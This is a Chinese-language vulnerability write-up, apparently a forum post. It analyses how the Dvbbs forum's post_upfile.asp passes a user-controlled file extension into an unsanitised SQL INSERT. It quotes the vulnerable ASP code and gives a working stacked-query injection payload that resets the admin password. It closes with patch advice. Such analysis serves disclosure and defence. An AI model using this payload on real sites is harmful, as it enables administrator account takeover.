前段時間聽說動網(wǎng)的上傳再次出現(xiàn)了不可修復的錯誤，有人居然說是upload.inc有錯，我仔細的讀了N遍代碼，可以肯定的說，upload.inc應該沒有辦法利用，今天無意中跑到動網(wǎng)的官方網(wǎng)站上去仔細的看了一下，個人資料修改里有上傳，但是發(fā)帖里卻沒有上傳，upload.asp和post_upload.asp同樣用到了upload.inc，證明這個文件絕對沒有問題，那問題一定出在post_upfile.asp上了，打開這個文件再次通讀一遍！
一看
If upload_ViewType<>999 and F_Type=1 then
Dvbbs.execute("insert into dv_upFile (F_BoardID,F_UserID,F_Username,F_Filename,F_Viewname,F_FileType,F_Type,F_FileSize,F_Flag) values ("&Dvbbs.BoardID&","&Dvbbs.UserID&",'"&Dvbbs.membername&"','"&replace(rename,"|","")&"','"&F_Viewname&"','"&replace(FileExt,".","")&"',"&F_Type&","&Filesize&",4)")
Else
Dvbbs.execute("insert into dv_upFile (F_BoardID,F_UserID,F_Username,F_Filename,F_FileType,F_Type,F_FileSize,F_Flag) values ("&Dvbbs.BoardID&","&Dvbbs.UserID&",'"&Dvbbs.membername&"','"&replace(rename,"|","")&"','"&replace(FileExt,".","")&"',"&F_Type&","&Filesize&",4)")
有sql語句，難道傳說中的上傳再次利用是注入而不是上傳，那我們就把他提交的變量每一個來通讀一下
Dvbbs.BoardID，Dvbbs.UserID，Dvbbs.membername，F(xiàn)_Viewname，F(xiàn)_Type，F(xiàn)ilesize這幾個是肯定沒有問題的，其它的幾個我們就來看一下，這幾個變量從哪來的，怎么得到的！
先說第一個replace(rename,"|","")把rename里的"|"這個符號去掉，我們看看rename的變量怎么來的，rename=createPath&Filename&"|"
是用createpath和filename連接起來再加上"|"生成的，"|"符號在后面被過濾了，可以不用考濾，再分別看看creatpath和filename
File_name = createName()
Filename = File_name&"."&FileExt（由file_name和fileExt聯(lián)合起來的）
Private Function createName()
Dim ranNum
Randomize
ranNum=int(999*rnd)
createName=year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum
End Function
很明顯，file＿name是按年月日加隨機數(shù)生成的，沒有辦法利用，疑點就在fileExt了。。。。。
難道，傳說中的就要出現(xiàn)了，先不慌，我們先看看其它的地方
而creatpath又是這樣來的
Private Function createPath()
Dim objFSO,Fsofolder,uploadpath
uploadpath=year(now)&"-"&month(now) '以年月創(chuàng)建上傳文件夾，格式：2003－8
On Error Resume Next
Set objFSO = Server.createObject("Scripting.FileSystemObject")
If objFSO.FolderExists(Server.MapPath(CheckFolder&uploadpath))=False Then
objFSO.createFolder Server.MapPath(CheckFolder&uploadpath)
End If
If Err.Number = 0 Then
createPath=uploadpath&"/"
Else
createPath=""
End If
Set objFSO = Nothing
End Function
creatpath又是用uploadpath加上fso按年月生成的，例如uploadfile/2004-11之類的，這樣，又不能利用
好，這里發(fā)現(xiàn)一個疑點了
我們再看另一個變量replace(FileExt,".","")，直接就是前面提到的有疑點的那個fileExt了，呵呵，看準了，就是他了。我們把他的來龍去脈全找出來，看看能不能利用
Set File=upload.File(FormName) ''生成一個文件對象
FileExt=FixName(File.FileExt)
在這里，他開始出現(xiàn)了
file.fileExt這個不是我們提交的擴展名嗎，玩過動網(wǎng)上傳的都知道，抓個包，改個擴展名這是蠻正常的事，看來有門了，至少我們這個地方可以利用，＝＝＝＝，F(xiàn)ileExt=FixName(File.FileExt)他還用fixname來過濾了的，我們看看這個函數(shù)有什么用
Function FixName(UpFileExt)
If IsEmpty(UpFileExt) Then Exit Function
FixName = Lcase(UpFileExt)
FixName = Replace(FixName,Chr(0),"")
FixName = Replace(FixName,".","")　哈哈，把.替換成空了，為什么動網(wǎng)sp2的上傳利用不了，就在這里的原因
FixName = Replace(FixName,"asp","")把asp替換成空
FixName = Replace(FixName,"asa","")　asa過濾
FixName = Replace(FixName,"aspx","")　aspx過濾
FixName = Replace(FixName,"cer","") cer過濾
FixName = Replace(FixName,"cdx","")　cdx過濾
FixName = Replace(FixName,"htr","") htr過濾
End Function
哈哈，全部只是過濾了一些特殊的地方，但是我們?nèi)绻脕碜⑷胗玫降囊枺痔?，逗號，－－，一個都沒有過濾，也就是說是通行無阻了，嘎嘎，接下來就是用到構(gòu)造語句了，我們再來看他的sql語句
insert into dv_upFile (F_BoardID,F_UserID,F_Username,F_Filename,F_Viewname,F_FileType,F_Type,F_FileSize,F_Flag) values ("&Dvbbs.BoardID&","&Dvbbs.UserID&",'"&Dvbbs.membername&"','"&replace(rename,"|","")&"','"&F_Viewname&"','"&replace(FileExt,".","")&"',"&F_Type&","&Filesize&",4)
在values后面
"&Dvbbs.BoardID&","&Dvbbs.UserID&",'"&Dvbbs.membername&"
這些全部是正常的，我們改了fleExt后，rename也跟著變化了，所以實際上后面的&replace(FileExt,".","")&這里我們就可以不管了，只要構(gòu)造前面的rename，再看看reanme是如何來的
rename=createPath&Filename&"|"
File_name = createName()
Filename = File_name&"."&FileExt
createpath是正常的一串值，可以不計，file_name也是正常的值可以不計，中間有一個.可以不計，后面的"|"他幫我們自己過濾了，可以不計.我們假設(shè)他的語句為
insert into dv_upFile (F_BoardID,F_UserID,F_Username,F_Filename,F_Viewname,F_FileType,F_Type,F_FileSize,F_Flag) values ("1","1",'"user"','uploadfile/2004-11/2324128374912.jpg','user','jpg',"1","1000",4)
這是一條正常的語句，我們能利用的地方就是jpg，這個地方是我們包里可以傳送過去的，是本地的文件擴展名，那我們就把jpg構(gòu)造成具體的完整的sql語句。
比如jpg替換成
jpg','user','jpg',"1","1000",4);update dv_admin set userpasswrod='123' where username='admin'--jpg
(說一句，他的f_type是用來檢測文件類型的，如果是1，也就是圖片就執(zhí)行的前一條sql語句，如果是其它就執(zhí)行的后一條語句，具體的代碼在這里
F_Type = CheckFiletype(FileExt)
checkfiletype函數(shù)的代碼又是這樣的
Private Function CheckFiletype(FileExt)
Dim upFiletype
Dim FilePic,FileVedio,FileSoft,FileFlash,FileMusic
FileExt=Lcase(Replace(FileExt,".",""))
select Case Lcase(FileExt)
Case "gif", "jpg", "jpeg","png","bmp","tif","iff"
CheckFiletype=1
Case "swf", "swi"
CheckFiletype=2
Case "mid", "wav", "mp3","rmi","cda"
CheckFiletype=3
Case "avi", "mpg", "mpeg","ra","ram","wov","asf"
CheckFiletype=4
Case Else
CheckFiletype=0
End select
End Function
這里也用到了fileExt這個變量，也就是我們的擴展名
去掉所有的".",然后再去取后的擴展名，所以我們的語句最后結(jié)束時要用考濾到這個，因為第一語句和第二語句構(gòu)造方法不一樣的！)
嘎嘎，dv_admin里的admin的userpassword就被改為123了.
如果是access版的好像有點難度，分號是不能多語執(zhí)行的，又不是where條件，不能拿來猜測，而且values的值好像不能用select 來把其它的值填入，只有把整個select 的值拿來返回做為記錄加入，沒辦法在values里單獨取值，有沒有人能有辦法構(gòu)造出這個完美的語法來，教教偶，偶sql水平不是蠻高，access版的暫時還沒有想到完整的辦法。
文章至些結(jié)束了，最重要的要說的就是所有的放入到sql語句里的參數(shù)都要嚴格檢測,這個地方的補丁一個是在fixname()函數(shù)里過濾，如果不會的暫時就先關(guān)掉發(fā)帖上傳的功能吧，等補??！:)